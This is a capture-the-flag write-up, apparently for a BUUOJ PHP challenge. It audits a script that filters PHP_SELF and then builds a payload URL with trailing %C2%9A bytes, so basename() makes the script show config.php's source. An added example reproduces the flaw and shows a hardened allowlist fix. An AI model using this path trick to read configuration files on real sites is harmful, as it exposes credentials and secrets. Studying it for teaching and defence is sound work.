Solution
<?php
include 'config.php'; // FLAG is defined in config.php

// Check 1: refuse requests whose PHP_SELF ends in "config.php" (optionally followed by slashes).
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("I don't know what you are thinking, but I won't let you read it :)");
}

// Check 2: ?source shows the source of the file named by basename(PHP_SELF).
if (isset($_GET['source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}

// Check 3: compare a POSTed guess against a fresh 64-byte random secret.
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if (hash_equals($secret, $guess)) {
        $message = 'Congratulations! The flag is: ' . FLAG;
    } else {
        $message = 'Wrong.';
    }
}
Code audit
The hint says the flag is in config.php. The first if filters config.php; from the write-up I read, it can be bypassed simply by appending a non-printable ASCII character after it.
The second if shows the source when the GET request contains source.
The third if handles the guess submitted via POST, casting it to a string; in practice it is useless.
Pick any blank character.
Construct the payload:
http://8af005b0-74e0-47b4-9d10-eae1cc9d7805.node3.buuoj.cn/index.php/config.php/%C2%9A?source
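To make the mismatch concrete, here is an added example (not part of the original write-up or the challenge source) that reproduces the check as a function and contrasts it with a hardened version. It assumes basename() runs under the C locale (PHP's default LC_CTYPE since 8.0), where basename() drops trailing bytes it cannot decode, and uses the %C2%9A bytes from the payload above as the trailing characters.

```php
<?php
// Added example, not the challenge's own code.
// The original decides on the raw PHP_SELF string but then reads
// basename(PHP_SELF): two different views of the same input.

function original_check_blocks(string $phpSelf): bool {
    // Same regex as the challenge: anchored at end of the raw string.
    return (bool) preg_match('/config\.php\/*$/i', $phpSelf);
}

function file_that_would_be_read(string $phpSelf): string {
    // What highlight_file() actually receives in the challenge.
    return basename($phpSelf);
}

function hardened_check_blocks(string $phpSelf): bool {
    // Decide on the value that is really used, and allowlist instead of
    // blocklist: only the front-controller script may be shown.
    $allowed = ['index.php']; // assumed name of the challenge script
    return !in_array(basename($phpSelf), $allowed, true);
}

$normal = '/index.php/config.php';
$trailing = "/index.php/config.php/\xC2\x9A"; // %C2%9A from the payload

foreach ([$normal, $trailing] as $path) {
    printf("input:     %s\n", bin2hex($path));
    printf("original:  %s\n", original_check_blocks($path) ? 'blocked' : 'allowed');
    printf("reads:     %s\n", file_that_would_be_read($path));
    printf("hardened:  %s\n\n", hardened_check_blocks($path) ? 'blocked' : 'allowed');
}
// Under the C locale the second input is allowed by the original regex
// (the string no longer ends in "config.php/"), yet basename() still
// yields "config.php"; the hardened check blocks both inputs.
```

Better still, a script that only ever shows its own source should call highlight_file(__FILE__) and not derive the filename from PHP_SELF at all.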